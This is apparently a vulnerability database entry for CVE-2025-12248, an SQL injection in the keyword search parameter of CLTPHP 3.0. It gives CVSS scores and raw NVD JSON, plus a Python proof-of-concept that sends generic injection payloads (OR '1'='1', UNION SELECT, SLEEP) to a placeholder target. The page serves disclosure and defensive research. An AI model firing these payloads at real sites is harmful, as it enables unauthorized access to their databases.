Security Vulnerability Report
中文
CVE-2025-12248 CVSS 7.3 HIGH

CVE-2025-12248

Published: 2025-10-27 08:15:38
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security vulnerability has been detected in CLTPHP 3.0. The affected element is an unknown function of the file /home/search.html. Such manipulation of the argument keyword leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

CLTPHP 3.0 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12248 SQL Injection PoC # Target: CLTPHP 3.0 search.html # Payload: keyword parameter SQL injection import requests import sys target_url = "http://target.com/home/search.html" # Basic SQL injection test payloads payloads = [ "' OR '1'='1", "' UNION SELECT NULL--", "' UNION SELECT 1,2,3,4,5--", "' AND SLEEP(5)--", "admin'--" ] def test_sql_injection(url, param='keyword'): print(f"[*] Testing SQL injection on {url}") print(f"[*] Parameter: {param}") for payload in payloads: try: params = {param: payload} response = requests.get(url, params=params, timeout=10) print(f"\n[+] Payload: {payload}") print(f" Status: {response.status_code}") print(f" Length: {len(response.text)}") # Check for SQL error indicators sql_errors = ['sql', 'syntax', 'mysql', 'error', 'warning'] if any(err in response.text.lower() for err in sql_errors): print(f" [!] Potential SQL error detected!") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) > 1: target_url = sys.argv[1] test_sql_injection(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12248", "sourceIdentifier": "[email protected]", "published": "2025-10-27T08:15:37.570", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in CLTPHP 3.0. The affected element is an unknown function of the file /home/search.html. Such manipulation of the argument keyword leads to sql injection. The attack may be performed from remote. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/1276486/CVE/issues/17", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329919", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329919", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.674880", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.